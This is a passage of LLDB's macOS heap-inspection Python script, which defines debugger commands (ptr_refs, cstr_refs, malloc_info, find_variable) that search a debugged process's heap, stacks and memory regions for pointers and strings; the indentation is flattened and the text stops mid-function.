# in the "lldb.macosx" package. To use this in the embedded python
# interpreter using "lldb" just import it:
#
# (lldb) script import lldb.macosx.heap
#----------------------------------------------------------------------
from __future__ import print_function
import lldb
import optparse
import os
import os.path
import re
import shlex
import string
import sys
import tempfile
import lldb.utils.symbolication
g_libheap_dylib_dir = None
g_libheap_dylib_dict = dict()
def get_iterate_memory_expr(
options,
process,
user_init_code,
user_return_code):
expr = '''
typedef unsigned natural_t;
typedef uintptr_t vm_size_t;
typedef uintptr_t vm_address_t;
typedef natural_t task_t;
typedef int kern_return_t;
#define KERN_SUCCESS 0
typedef void (*range_callback_t)(task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size);
'''
if options.search_vm_regions:
expr += '''
typedef int vm_prot_t;
typedef unsigned int vm_inherit_t;
typedef unsigned long long memory_object_offset_t;
typedef unsigned int boolean_t;
typedef int vm_behavior_t;
typedef uint32_t vm32_object_id_t;
typedef natural_t mach_msg_type_number_t;
typedef uint64_t mach_vm_address_t;
typedef uint64_t mach_vm_offset_t;
typedef uint64_t mach_vm_size_t;
typedef uint64_t vm_map_offset_t;
typedef uint64_t vm_map_address_t;
typedef uint64_t vm_map_size_t;
#define VM_PROT_NONE ((vm_prot_t) 0x00)
#define VM_PROT_READ ((vm_prot_t) 0x01)
#define VM_PROT_WRITE ((vm_prot_t) 0x02)
#define VM_PROT_EXECUTE ((vm_prot_t) 0x04)
typedef struct vm_region_submap_short_info_data_64_t {
vm_prot_t protection;
vm_prot_t max_protection;
vm_inherit_t inheritance;
memory_object_offset_t offset; // offset into object/map
unsigned int user_tag; // user tag on map entry
unsigned int ref_count; // obj/map mappers, etc
unsigned short shadow_depth; // only for obj
unsigned char external_pager; // only for obj
unsigned char share_mode; // see enumeration
boolean_t is_submap; // submap vs obj
vm_behavior_t behavior; // access behavior hint
vm32_object_id_t object_id; // obj/map name, not a handle
unsigned short user_wired_count;
} vm_region_submap_short_info_data_64_t;
#define VM_REGION_SUBMAP_SHORT_INFO_COUNT_64 ((mach_msg_type_number_t)(sizeof(vm_region_submap_short_info_data_64_t)/sizeof(int)))'''
if user_init_code:
expr += user_init_code
expr += '''
task_t task = (task_t)mach_task_self();
mach_vm_address_t vm_region_base_addr;
mach_vm_size_t vm_region_size;
natural_t vm_region_depth;
vm_region_submap_short_info_data_64_t vm_region_info;
kern_return_t err;
for (vm_region_base_addr = 0, vm_region_size = 1; vm_region_size != 0; vm_region_base_addr += vm_region_size)
{
mach_msg_type_number_t vm_region_info_size = VM_REGION_SUBMAP_SHORT_INFO_COUNT_64;
err = (kern_return_t)mach_vm_region_recurse (task,
&vm_region_base_addr,
&vm_region_size,
&vm_region_depth,
&vm_region_info,
&vm_region_info_size);
if (err)
break;
// Check all read + write regions. This will cover the thread stacks
// and any regions of memory like __DATA segments, that might contain
// data we are looking for
if (vm_region_info.protection & VM_PROT_WRITE &&
vm_region_info.protection & VM_PROT_READ)
{
baton.callback (task,
&baton,
64,
vm_region_base_addr,
vm_region_size);
}
}'''
else:
if options.search_stack:
expr += get_thread_stack_ranges_struct(process)
if options.search_segments:
expr += get_sections_ranges_struct(process)
if user_init_code:
expr += user_init_code
if options.search_heap:
expr += '''
#define MALLOC_PTR_IN_USE_RANGE_TYPE 1
typedef struct vm_range_t {
vm_address_t address;
vm_size_t size;
} vm_range_t;
typedef kern_return_t (*memory_reader_t)(task_t task, vm_address_t remote_address, vm_size_t size, void **local_memory);
typedef void (*vm_range_recorder_t)(task_t task, void *baton, unsigned type, vm_range_t *range, unsigned size);
typedef struct malloc_introspection_t {
kern_return_t (*enumerator)(task_t task, void *, unsigned type_mask, vm_address_t zone_address, memory_reader_t reader, vm_range_recorder_t recorder); /* enumerates all the malloc pointers in use */
} malloc_introspection_t;
typedef struct malloc_zone_t {
void *reserved1[12];
struct malloc_introspection_t *introspect;
} malloc_zone_t;
memory_reader_t task_peek = [](task_t task, vm_address_t remote_address, vm_size_t size, void **local_memory) -> kern_return_t {
*local_memory = (void*) remote_address;
return KERN_SUCCESS;
};
vm_address_t *zones = 0;
unsigned int num_zones = 0;task_t task = 0;
kern_return_t err = (kern_return_t)malloc_get_all_zones (task, task_peek, &zones, &num_zones);
if (KERN_SUCCESS == err)
{
for (unsigned int i=0; i<num_zones; ++i)
{
const malloc_zone_t *zone = (const malloc_zone_t *)zones[i];
if (zone && zone->introspect)
zone->introspect->enumerator (task,
&baton,
MALLOC_PTR_IN_USE_RANGE_TYPE,
(vm_address_t)zone,
task_peek,
[] (task_t task, void *baton, unsigned type, vm_range_t *ranges, unsigned size) -> void
{
range_callback_t callback = ((callback_baton_t *)baton)->callback;
for (unsigned i=0; i<size; ++i)
{
callback (task, baton, type, ranges[i].address, ranges[i].size);
}
});
}
}'''
if options.search_stack:
expr += '''
#ifdef NUM_STACKS
// Call the callback for the thread stack ranges
for (uint32_t i=0; i<NUM_STACKS; ++i) {
range_callback(task, &baton, 8, stacks[i].base, stacks[i].size);
if (STACK_RED_ZONE_SIZE > 0) {
range_callback(task, &baton, 16, stacks[i].base - STACK_RED_ZONE_SIZE, STACK_RED_ZONE_SIZE);
}
}
#endif'''
if options.search_segments:
expr += '''
#ifdef NUM_SEGMENTS
// Call the callback for all segments
for (uint32_t i=0; i<NUM_SEGMENTS; ++i)
range_callback(task, &baton, 32, segments[i].base, segments[i].size);
#endif'''
if user_return_code:
expr += "\n%s" % (user_return_code,)
return expr
def get_member_types_for_offset(value_type, offset, member_list):
member = value_type.GetFieldAtIndex(0)
search_bases = False
if member:
if member.GetOffsetInBytes() <= offset:
for field_idx in range(value_type.GetNumberOfFields()):
member = value_type.GetFieldAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
else:
search_bases = True
else:
search_bases = True
if search_bases:
for field_idx in range(value_type.GetNumberOfDirectBaseClasses()):
member = value_type.GetDirectBaseClassAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
for field_idx in range(value_type.GetNumberOfVirtualBaseClasses()):
member = value_type.GetVirtualBaseClassAtIndex(field_idx)
member_byte_offset = member.GetOffsetInBytes()
member_end_byte_offset = member_byte_offset + member.type.size
if member_byte_offset <= offset and offset < member_end_byte_offset:
member_list.append(member)
get_member_types_for_offset(
member.type, offset - member_byte_offset, member_list)
return
def append_regex_callback(option, opt, value, parser):
try:
ivar_regex = re.compile(value)
parser.values.ivar_regex_blacklist.append(ivar_regex)
except:
print('error: an exception was thrown when compiling the ivar regular expression for "%s"' % value)
def add_common_options(parser):
parser.add_option(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='display verbose debug info',
default=False)
parser.add_option(
'-t',
'--type',
action='store_true',
dest='print_type',
help='print the full value of the type for each matching malloc block',
default=False)
parser.add_option(
'-o',
'--po',
action='store_true',
dest='print_object_description',
help='print the object descriptions for any matches',
default=False)
parser.add_option(
'-z',
'--size',
action='store_true',
dest='show_size',
help='print the allocation size in bytes',
default=False)
parser.add_option(
'-r',
'--range',
action='store_true',
dest='show_range',
help='print the allocation address range instead of just the allocation base address',
default=False)
parser.add_option(
'-m',
'--memory',
action='store_true',
dest='memory',
help='dump the memory for each matching block',
default=False)
parser.add_option(
'-f',
'--format',
type='string',
dest='format',
help='the format to use when dumping memory if --memory is specified',
default=None)
parser.add_option(
'-I',
'--omit-ivar-regex',
type='string',
action='callback',
callback=append_regex_callback,
dest='ivar_regex_blacklist',
default=[],
help='specify one or more regular expressions used to backlist any matches that are in ivars')
parser.add_option(
'-s',
'--stack',
action='store_true',
dest='stack',
help='gets the stack that allocated each malloc block if MallocStackLogging is enabled',
default=False)
parser.add_option(
'-S',
'--stack-history',
action='store_true',
dest='stack_history',
help='gets the stack history for all allocations whose start address matches each malloc block if MallocStackLogging is enabled',
default=False)
parser.add_option(
'-F',
'--max-frames',
type='int',
dest='max_frames',
help='the maximum number of stack frames to print when using the --stack or --stack-history options (default=128)',
default=128)
parser.add_option(
'-H',
'--max-history',
type='int',
dest='max_history',
help='the maximum number of stack history backtraces to print for each allocation when using the --stack-history option (default=16)',
default=16)
parser.add_option(
'-M',
'--max-matches',
type='int',
dest='max_matches',
help='the maximum number of matches to print',
default=32)
parser.add_option(
'-O',
'--offset',
type='int',
dest='offset',
help='the matching data must be at this offset',
default=-1)
parser.add_option(
'--ignore-stack',
action='store_false',
dest='search_stack',
help="Don't search the stack when enumerating memory",
default=True)
parser.add_option(
'--ignore-heap',
action='store_false',
dest='search_heap',
help="Don't search the heap allocations when enumerating memory",
default=True)
parser.add_option(
'--ignore-segments',
action='store_false',
dest='search_segments',
help="Don't search readable executable segments enumerating memory",
default=True)
parser.add_option(
'-V',
'--vm-regions',
action='store_true',
dest='search_vm_regions',
help='Check all VM regions instead of searching the heap, stack and segments',
default=False)
def type_flags_to_string(type_flags):
if type_flags == 0:
type_str = 'free'
elif type_flags & 2:
type_str = 'malloc'
elif type_flags & 4:
type_str = 'free'
elif type_flags & 1:
type_str = 'generic'
elif type_flags & 8:
type_str = 'stack'
elif type_flags & 16:
type_str = 'stack (red zone)'
elif type_flags & 32:
type_str = 'segment'
elif type_flags & 64:
type_str = 'vm_region'
else:
type_str = hex(type_flags)
return type_str
def find_variable_containing_address(verbose, frame, match_addr):
variables = frame.GetVariables(True, True, True, True)
matching_var = None
for var in variables:
var_addr = var.GetLoadAddress()
if var_addr != lldb.LLDB_INVALID_ADDRESS:
byte_size = var.GetType().GetByteSize()
if verbose:
print('frame #%u: [%#x - %#x) %s' % (frame.GetFrameID(), var.load_addr, var.load_addr + byte_size, var.name))
if var_addr == match_addr:
if verbose:
print('match')
return var
else:
if byte_size > 0 and var_addr <= match_addr and match_addr < (
var_addr + byte_size):
if verbose:
print('match')
return var
return None
def find_frame_for_stack_address(process, addr):
closest_delta = sys.maxsize
closest_frame = None
# print 'find_frame_for_stack_address(%#x)' % (addr)
for thread in process:
prev_sp = lldb.LLDB_INVALID_ADDRESS
for frame in thread:
cfa = frame.GetCFA()
# print 'frame #%u: cfa = %#x' % (frame.GetFrameID(), cfa)
if addr < cfa:
delta = cfa - addr
# print '%#x < %#x, delta = %i' % (addr, cfa, delta)
if delta < closest_delta:
# print 'closest'
closest_delta = delta
closest_frame = frame
# else:
# print 'delta >= closest_delta'
return closest_frame
def type_flags_to_description(
process,
type_flags,
ptr_addr,
ptr_size,
offset,
match_addr):
show_offset = False
if type_flags == 0 or type_flags & 4:
type_str = 'free(%#x)' % (ptr_addr,)
elif type_flags & 2 or type_flags & 1:
type_str = 'malloc(%6u) -> %#x' % (ptr_size, ptr_addr)
show_offset = True
elif type_flags & 8:
type_str = 'stack'
frame = find_frame_for_stack_address(process, match_addr)
if frame:
type_str += ' in frame #%u of thread #%u: tid %#x' % (frame.GetFrameID(
), frame.GetThread().GetIndexID(), frame.GetThread().GetThreadID())
variables = frame.GetVariables(True, True, True, True)
matching_var = None
for var in variables:
var_addr = var.GetLoadAddress()
if var_addr != lldb.LLDB_INVALID_ADDRESS:
# print 'variable "%s" @ %#x (%#x)' % (var.name, var.load_addr,
# match_addr)
if var_addr == match_addr:
matching_var = var
break
else:
byte_size = var.GetType().GetByteSize()
if byte_size > 0 and var_addr <= match_addr and match_addr < (
var_addr + byte_size):
matching_var = var
break
if matching_var:
type_str += ' in variable at %#x:\n %s' % (
matching_var.GetLoadAddress(), matching_var)
elif type_flags & 16:
type_str = 'stack (red zone)'
elif type_flags & 32:
sb_addr = process.GetTarget().ResolveLoadAddress(ptr_addr + offset)
type_str = 'segment [%#x - %#x), %s + %u, %s' % (
ptr_addr, ptr_addr + ptr_size, sb_addr.section.name, sb_addr.offset, sb_addr)
elif type_flags & 64:
sb_addr = process.GetTarget().ResolveLoadAddress(ptr_addr + offset)
type_str = 'vm_region [%#x - %#x), %s + %u, %s' % (
ptr_addr, ptr_addr + ptr_size, sb_addr.section.name, sb_addr.offset, sb_addr)
else:
type_str = '%#x' % (ptr_addr,)
show_offset = True
if show_offset and offset != 0:
type_str += ' + %-6u' % (offset,)
return type_str
def dump_stack_history_entry(options, result, stack_history_entry, idx):
address = int(stack_history_entry.address)
if address:
type_flags = int(stack_history_entry.type_flags)
symbolicator = lldb.utils.symbolication.Symbolicator()
symbolicator.target = lldb.debugger.GetSelectedTarget()
type_str = type_flags_to_string(type_flags)
result.AppendMessage(
'stack[%u]: addr = 0x%x, type=%s, frames:' %
(idx, address, type_str))
frame_idx = 0
idx = 0
pc = int(stack_history_entry.frames[idx])
while pc != 0:
if pc >= 0x1000:
frames = symbolicator.symbolicate(pc)
if frames:
for frame in frames:
result.AppendMessage(
' [%u] %s' %
(frame_idx, frame))
frame_idx += 1
else:
result.AppendMessage(' [%u] 0x%x' % (frame_idx, pc))
frame_idx += 1
idx = idx + 1
pc = int(stack_history_entry.frames[idx])
else:
pc = 0
if idx >= options.max_frames:
result.AppendMessage(
'warning: the max number of stack frames (%u) was reached, use the "--max-frames=<COUNT>" option to see more frames' %
(options.max_frames))
result.AppendMessage('')
def dump_stack_history_entries(options, result, addr, history):
# malloc_stack_entry *get_stack_history_for_address (const void * addr)
expr_prefix = '''
typedef int kern_return_t;
typedef struct $malloc_stack_entry {
uint64_t address;
uint64_t argument;
uint32_t type_flags;
uint32_t num_frames;
uint64_t frames[512];
kern_return_t err;
} $malloc_stack_entry;
'''
single_expr = '''
#define MAX_FRAMES %u
typedef unsigned task_t;
$malloc_stack_entry stack;
stack.address = 0x%x;
stack.type_flags = 2;
stack.num_frames = 0;
stack.frames[0] = 0;
uint32_t max_stack_frames = MAX_FRAMES;
stack.err = (kern_return_t)__mach_stack_logging_get_frames (
(task_t)mach_task_self(),
stack.address,
&stack.frames[0],
max_stack_frames,
&stack.num_frames);
if (stack.num_frames < MAX_FRAMES)
stack.frames[stack.num_frames] = 0;
else
stack.frames[MAX_FRAMES-1] = 0;
stack''' % (options.max_frames, addr)
history_expr = '''
typedef int kern_return_t;
typedef unsigned task_t;
#define MAX_FRAMES %u
#define MAX_HISTORY %u
typedef struct mach_stack_logging_record_t {
uint32_t type_flags;
uint64_t stack_identifier;
uint64_t argument;
uint64_t address;
} mach_stack_logging_record_t;
typedef void (*enumerate_callback_t)(mach_stack_logging_record_t, void *);
typedef struct malloc_stack_entry {
uint64_t address;
uint64_t argument;
uint32_t type_flags;
uint32_t num_frames;
uint64_t frames[MAX_FRAMES];
kern_return_t frames_err;
} malloc_stack_entry;
typedef struct $malloc_stack_history {
task_t task;
unsigned idx;
malloc_stack_entry entries[MAX_HISTORY];
} $malloc_stack_history;
$malloc_stack_history lldb_info = { (task_t)mach_task_self(), 0 };
uint32_t max_stack_frames = MAX_FRAMES;
enumerate_callback_t callback = [] (mach_stack_logging_record_t stack_record, void *baton) -> void {
$malloc_stack_history *lldb_info = ($malloc_stack_history *)baton;
if (lldb_info->idx < MAX_HISTORY) {
malloc_stack_entry *stack_entry = &(lldb_info->entries[lldb_info->idx]);
stack_entry->address = stack_record.address;
stack_entry->type_flags = stack_record.type_flags;
stack_entry->argument = stack_record.argument;
stack_entry->num_frames = 0;
stack_entry->frames[0] = 0;
stack_entry->frames_err = (kern_return_t)__mach_stack_logging_frames_for_uniqued_stack (
lldb_info->task,
stack_record.stack_identifier,
stack_entry->frames,
(uint32_t)MAX_FRAMES,
&stack_entry->num_frames);
// Terminate the frames with zero if there is room
if (stack_entry->num_frames < MAX_FRAMES)
stack_entry->frames[stack_entry->num_frames] = 0;
}
++lldb_info->idx;
};
(kern_return_t)__mach_stack_logging_enumerate_records (lldb_info.task, (uint64_t)0x%x, callback, &lldb_info);
lldb_info''' % (options.max_frames, options.max_history, addr)
frame = lldb.debugger.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame()
if history:
expr = history_expr
else:
expr = single_expr
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetTimeoutInMicroSeconds(5 * 1000 * 1000) # 5 second timeout
expr_options.SetTryAllThreads(True)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
expr_options.SetPrefix(expr_prefix)
expr_sbvalue = frame.EvaluateExpression(expr, expr_options)
if options.verbose:
print("expression:")
print(expr)
print("expression result:")
print(expr_sbvalue)
if expr_sbvalue.error.Success():
if history:
malloc_stack_history = lldb.value(expr_sbvalue)
num_stacks = int(malloc_stack_history.idx)
if num_stacks <= options.max_history:
i_max = num_stacks
else:
i_max = options.max_history
for i in range(i_max):
stack_history_entry = malloc_stack_history.entries[i]
dump_stack_history_entry(
options, result, stack_history_entry, i)
if num_stacks > options.max_history:
result.AppendMessage(
'warning: the max number of stacks (%u) was reached, use the "--max-history=%u" option to see all of the stacks' %
(options.max_history, num_stacks))
else:
stack_history_entry = lldb.value(expr_sbvalue)
dump_stack_history_entry(options, result, stack_history_entry, 0)
else:
result.AppendMessage(
'error: expression failed "%s" => %s' %
(expr, expr_sbvalue.error))
def display_match_results(
process,
result,
options,
arg_str_description,
expr,
print_no_matches,
expr_prefix=None):
frame = lldb.debugger.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return 0
expr_options = lldb.SBExpressionOptions()
expr_options.SetIgnoreBreakpoints(True)
expr_options.SetFetchDynamicValue(lldb.eNoDynamicValues)
expr_options.SetTimeoutInMicroSeconds(
30 * 1000 * 1000) # 30 second timeout
expr_options.SetTryAllThreads(False)
expr_options.SetLanguage(lldb.eLanguageTypeObjC_plus_plus)
if expr_prefix:
expr_options.SetPrefix(expr_prefix)
expr_sbvalue = frame.EvaluateExpression(expr, expr_options)
if options.verbose:
print("expression:")
print(expr)
print("expression result:")
print(expr_sbvalue)
if expr_sbvalue.error.Success():
match_value = lldb.value(expr_sbvalue)
i = 0
match_idx = 0
while True:
print_entry = True
match_entry = match_value[i]
i += 1
if i > options.max_matches:
result.AppendMessage(
'warning: the max number of matches (%u) was reached, use the --max-matches option to get more results' %
(options.max_matches))
break
malloc_addr = match_entry.addr.sbvalue.unsigned
if malloc_addr == 0:
break
malloc_size = int(match_entry.size)
offset = int(match_entry.offset)
if options.offset >= 0 and options.offset != offset:
print_entry = False
else:
match_addr = malloc_addr + offset
type_flags = int(match_entry.type)
#result.AppendMessage (hex(malloc_addr + offset))
if type_flags == 64:
search_stack_old = options.search_stack
search_segments_old = options.search_segments
search_heap_old = options.search_heap
search_vm_regions = options.search_vm_regions
options.search_stack = True
options.search_segments = True
options.search_heap = True
options.search_vm_regions = False
if malloc_info_impl(lldb.debugger, result, options, [
hex(malloc_addr + offset)]):
print_entry = False
options.search_stack = search_stack_old
options.search_segments = search_segments_old
options.search_heap = search_heap_old
options.search_vm_regions = search_vm_regions
if print_entry:
description = '%#16.16x: %s' % (match_addr, type_flags_to_description(
process, type_flags, malloc_addr, malloc_size, offset, match_addr))
if options.show_size:
description += ' <%5u>' % (malloc_size)
if options.show_range:
description += ' [%#x - %#x)' % (
malloc_addr, malloc_addr + malloc_size)
derefed_dynamic_value = None
dynamic_value = match_entry.addr.sbvalue.GetDynamicValue(
lldb.eDynamicCanRunTarget)
if dynamic_value.type.name == 'void *':
if options.type == 'pointer' and malloc_size == 4096:
error = lldb.SBError()
process = expr_sbvalue.GetProcess()
target = expr_sbvalue.GetTarget()
data = bytearray(
process.ReadMemory(
malloc_addr, 16, error))
if data == '\xa1\xa1\xa1\xa1AUTORELEASE!':
ptr_size = target.addr_size
thread = process.ReadUnsignedFromMemory(
malloc_addr + 16 + ptr_size, ptr_size, error)
# 4 bytes 0xa1a1a1a1
# 12 bytes 'AUTORELEASE!'
# ptr bytes autorelease insertion point
# ptr bytes pthread_t
# ptr bytes next colder page
# ptr bytes next hotter page
# 4 bytes this page's depth in the list
# 4 bytes high-water mark
description += ' AUTORELEASE! for pthread_t %#x' % (
thread)
# else:
# description += 'malloc(%u)' % (malloc_size)
# else:
# description += 'malloc(%u)' % (malloc_size)
else:
derefed_dynamic_value = dynamic_value.deref
if derefed_dynamic_value:
derefed_dynamic_type = derefed_dynamic_value.type
derefed_dynamic_type_size = derefed_dynamic_type.size
derefed_dynamic_type_name = derefed_dynamic_type.name
description += ' '
description += derefed_dynamic_type_name
if offset < derefed_dynamic_type_size:
member_list = list()
get_member_types_for_offset(
derefed_dynamic_type, offset, member_list)
if member_list:
member_path = ''
for member in member_list:
member_name = member.name
if member_name:
if member_path:
member_path += '.'
member_path += member_name
if member_path:
if options.ivar_regex_blacklist:
for ivar_regex in options.ivar_regex_blacklist:
if ivar_regex.match(
member_path):
print_entry = False
description += '.%s' % (member_path)
else:
description += '%u bytes after %s' % (
offset - derefed_dynamic_type_size, derefed_dynamic_type_name)
else:
# strip the "*" from the end of the name since we
# were unable to dereference this
description += dynamic_value.type.name[0:-1]
if print_entry:
match_idx += 1
result_output = ''
if description:
result_output += description
if options.print_type and derefed_dynamic_value:
result_output += ' %s' % (derefed_dynamic_value)
if options.print_object_description and dynamic_value:
desc = dynamic_value.GetObjectDescription()
if desc:
result_output += '\n%s' % (desc)
if result_output:
result.AppendMessage(result_output)
if options.memory:
cmd_result = lldb.SBCommandReturnObject()
if options.format is None:
memory_command = "memory read --force 0x%x 0x%x" % (
malloc_addr, malloc_addr + malloc_size)
else:
memory_command = "memory read --force -f %s 0x%x 0x%x" % (
options.format, malloc_addr, malloc_addr + malloc_size)
if options.verbose:
result.AppendMessage(memory_command)
lldb.debugger.GetCommandInterpreter().HandleCommand(memory_command, cmd_result)
result.AppendMessage(cmd_result.GetOutput())
if options.stack_history:
dump_stack_history_entries(options, result, malloc_addr, 1)
elif options.stack:
dump_stack_history_entries(options, result, malloc_addr, 0)
return i
else:
result.AppendMessage(str(expr_sbvalue.error))
return 0
def get_ptr_refs_options():
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
description = '''Searches all allocations on the heap for pointer values on
darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the pointers and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='ptr_refs',
usage=usage)
add_common_options(parser)
return parser
def find_variable(debugger, command, result, dict):
usage = "usage: %prog [options] <ADDR> [ADDR ...]"
description = '''Searches for a local variable in all frames that contains a hex ADDR.'''
command_args = shlex.split(command)
parser = optparse.OptionParser(
description=description,
prog='find_variable',
usage=usage)
parser.add_option(
'-v',
'--verbose',
action='store_true',
dest='verbose',
help='display verbose debug info',
default=False)
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
for arg in args:
var_addr = int(arg, 16)
print("Finding a variable with address %#x..." % (var_addr), file=result)
done = False
for thread in process:
for frame in thread:
var = find_variable_containing_address(
options.verbose, frame, var_addr)
if var:
print(var)
done = True
break
if done:
break
def ptr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_ptr_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'pointer'
if options.format is None:
options.format = "A" # 'A' is "address" format
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
void *ptr;
} callback_baton_t;
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
typedef void* T;
const unsigned size = sizeof(T);
T *array = (T*)ptr_addr;
for (unsigned idx = 0; ((idx + 1) * sizeof(T)) <= ptr_size; ++idx) {
if (array[idx] == lldb_info->ptr) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = idx*sizeof(T);
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
};
callback_baton_t baton = { range_callback, 0, {0}, (void *)%s };
'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our pointer expressions and display the
# results
for ptr_expr in args:
user_init_code = user_init_code_format % (
options.max_matches, ptr_expr)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'malloc block containing pointer %s' % ptr_expr
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage('error: no pointer arguments were given')
def get_cstr_refs_options():
usage = "usage: %prog [options] <CSTR> [CSTR ...]"
description = '''Searches all allocations on the heap for C string values on
darwin user space programs. Any matches that were found will dump the malloc
blocks that contain the C strings and might be able to print what kind of
objects the pointers are contained in using dynamic type information in the
program.'''
parser = optparse.OptionParser(
description=description,
prog='cstr_refs',
usage=usage)
add_common_options(parser)
return parser
def cstr_refs(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_cstr_refs_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
options.type = 'cstr'
if options.format is None:
options.format = "Y" # 'Y' is "bytes with ASCII" format
if args:
# When we initialize the expression, we must define any types that
# we will need when looking at every allocation. We must also define
# a type named callback_baton_t and make an instance named "baton"
# and initialize it how ever we want to. The address of "baton" will
# be passed into our range callback. callback_baton_t must contain
# a member named "callback" whose type is "range_callback_t". This
# will be used by our zone callbacks to call the range callback for
# each malloc range.
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
#define MAX_MATCHES %u
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[MAX_MATCHES];
const char *cstr;
unsigned cstr_len;
} callback_baton_t;
range_callback_t range_callback = [](task_t task, void *baton, unsigned type, uintptr_t ptr_addr, uintptr_t ptr_size) -> void {
callback_baton_t *lldb_info = (callback_baton_t *)baton;
if (lldb_info->cstr_len < ptr_size) {
const char *begin = (const char *)ptr_addr;
const char *end = begin + ptr_size - lldb_info->cstr_len;
for (const char *s = begin; s < end; ++s) {
if ((int)memcmp(s, lldb_info->cstr, lldb_info->cstr_len) == 0) {
if (lldb_info->num_matches < MAX_MATCHES) {
lldb_info->matches[lldb_info->num_matches].addr = (void*)ptr_addr;
lldb_info->matches[lldb_info->num_matches].size = ptr_size;
lldb_info->matches[lldb_info->num_matches].offset = s - begin;
lldb_info->matches[lldb_info->num_matches].type = type;
++lldb_info->num_matches;
}
}
}
}
};
const char *cstr = "%s";
callback_baton_t baton = { range_callback, 0, {0}, cstr, (unsigned)strlen(cstr) };'''
# We must also define a snippet of code to be run that returns
# the result of the expression we run.
# Here we return NULL if our pointer was not found in any malloc blocks,
# and we return the address of the matches array so we can then access
# the matching results
user_return_code = '''if (baton.num_matches < MAX_MATCHES)
baton.matches[baton.num_matches].addr = 0; // Terminate the matches array
baton.matches'''
# Iterate through all of our pointer expressions and display the
# results
for cstr in args:
user_init_code = user_init_code_format % (
options.max_matches, cstr)
expr = get_iterate_memory_expr(
options, process, user_init_code, user_return_code)
arg_str_description = 'malloc block containing "%s"' % cstr
display_match_results(
process,
result,
options,
arg_str_description,
expr,
True,
expr_prefix)
else:
result.AppendMessage(
'error: command takes one or more C string arguments')
def get_malloc_info_options():
usage = "usage: %prog [options] <EXPR> [EXPR ...]"
description = '''Searches the heap a malloc block that contains the addresses
specified as one or more address expressions. Any matches that were found will
dump the malloc blocks that match or contain the specified address. The matching
blocks might be able to show what kind of objects they are using dynamic type
information in the program.'''
parser = optparse.OptionParser(
description=description,
prog='malloc_info',
usage=usage)
add_common_options(parser)
return parser
def malloc_info(debugger, command, result, dict):
command_args = shlex.split(command)
parser = get_malloc_info_options()
try:
(options, args) = parser.parse_args(command_args)
except:
return
malloc_info_impl(debugger, result, options, args)
def malloc_info_impl(debugger, result, options, args):
# We are specifically looking for something on the heap only
options.type = 'malloc_info'
process = debugger.GetSelectedTarget().GetProcess()
if not process:
result.AppendMessage('error: invalid process')
return
frame = process.GetSelectedThread().GetSelectedFrame()
if not frame:
result.AppendMessage('error: invalid frame')
return
expr_prefix = '''
struct $malloc_match {
void *addr;
uintptr_t size;
uintptr_t offset;
uintptr_t type;
};
'''
user_init_code_format = '''
typedef struct callback_baton_t {
range_callback_t callback;
unsigned num_matches;
$malloc_match matches[2]; // Two items so they can be NULL terminated
void *ptr;
} callback_baton_t;
